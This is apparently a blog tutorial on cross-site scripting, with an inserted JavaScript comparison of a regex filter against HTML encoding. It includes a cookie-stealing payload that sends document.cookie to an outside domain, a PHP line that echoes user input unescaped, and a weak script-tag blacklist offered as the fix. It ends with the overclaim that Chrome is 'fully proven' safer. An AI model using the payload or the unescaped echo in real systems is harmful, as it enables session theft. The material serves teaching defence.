<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<title>New Document</title>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8"/>
</head>
<body>
<form action="xss.php" name="xss_form" id="xss_form" method="post">
<textarea cols="20" rows="10" name="tt" id="tt"></textarea>
<input type="submit" name="submit" value="submit">
</form>
</body>
</html>
Enter the following content in the text box:
<script>
function test() {
  var img = new Image();
  img.src = "http://www.caihuadadao.com?cookie=" + encodeURIComponent(document.cookie);
}
</script>
<a href="http://www.bkjia.com" onclick="test();">click it and you're done.</a>
Only one line of code is needed in xss.php (it echoes the textarea field named tt back into the page):
echo $_POST['tt'];
Watching the traffic in IE8 with HttpWatch (http://www.bkjia.com/soft/201109/29656.html), after clicking "click it and you're done" you can see that an unfriendly HTTP request was sent.
Imagine a scenario: an attacker publishes a post on a website with the content above. An innocent user then only needs to click the link "click it and you're done", and the browser automatically sends that user's personal information (the cookie) to the attacker.
The solution is relatively simple: filter out the script tag together with the content inside it. A reliable system should strip the script tag on both the client and the server:
$str = preg_replace('/<script[^>]*?>.*?<\/script>/is', '', $str); // "i": match any case; "s": let "." span the line breaks inside the script block
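To show what the filter above actually does, here is an added example (not code from the original post) that reimplements the same script-tag regex in JavaScript, runs it over a constructed copy of the payload the post describes, and places it beside the alternative the post does not show: encoding the user's text as HTML entities before it is echoed, so the browser renders it as text instead of parsing it. The function names (stripScriptTags, escapeHtml, hasInlineEventHandler) are my own; the sample input is constructed from the post's own markup.

```javascript
// Added example, not part of the original post. Compares the post's
// regex blacklist with HTML entity encoding on a constructed sample.

// Constructed sample: the markup the post tells the attacker to enter
// into the textarea.
const SAMPLE_POST = [
  '<script>',
  'function test() {',
  '  var img = new Image();',
  '  img.src = "http://www.caihuadadao.com?cookie=" + encodeURIComponent(document.cookie);',
  '}',
  '</script>',
  '<a href="http://www.bkjia.com" onclick="test();">click it and you\'re done.</a>',
].join('\n');

// 1. The post's approach: remove <script>...</script> blocks.
// [\s\S] stands in for "." so the match spans line breaks
// (the equivalent of the "s" modifier in PHP's preg_replace).
function stripScriptTags(html) {
  return html.replace(/<script[^>]*?>[\s\S]*?<\/script>/gi, '');
}

// 2. Output encoding: every character with markup meaning becomes an
// entity, so whatever the user typed is displayed, never parsed.
function escapeHtml(text) {
  return String(text)
    .replace(/&/g, '&amp;') // first, or the entities below get double-encoded
    .replace(/</g, '&lt;')
    .replace(/>/g, '&gt;')
    .replace(/"/g, '&quot;')
    .replace(/'/g, '&#39;');
}

// Check used to audit filter output: does the markup still carry an
// inline event-handler attribute (onclick=, onerror=, ...)?
function hasInlineEventHandler(html) {
  return /\son[a-z]+\s*=/i.test(html);
}

// Run both approaches over the sample and report what survives.
function demo() {
  const stripped = stripScriptTags(SAMPLE_POST);
  const encoded = escapeHtml(SAMPLE_POST);
  return {
    strippedHasScript: /<script/i.test(stripped),   // false: the block is gone
    strippedHasHandler: hasInlineEventHandler(stripped), // true: onclick= remains
    encodedHasTag: /<[a-z!/]/i.test(encoded),       // false: no tags survive encoding
  };
}

console.log(demo());
```

The result shows the limit of a blacklist: the script block is removed, but the anchor's onclick attribute passes through the regex untouched, so anything that reintroduces a function for it to call would run again. Encoding on output (htmlspecialchars in PHP does the same job as escapeHtml here) leaves no tags at all, which is why it is the usual recommendation for echoing user input into a page.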
In Chrome, when you click "click it and you're done", the HTTP request to the attacker is not sent, that is, the JavaScript submitted by the attacker is not executed; this fully proves that Chrome is safer.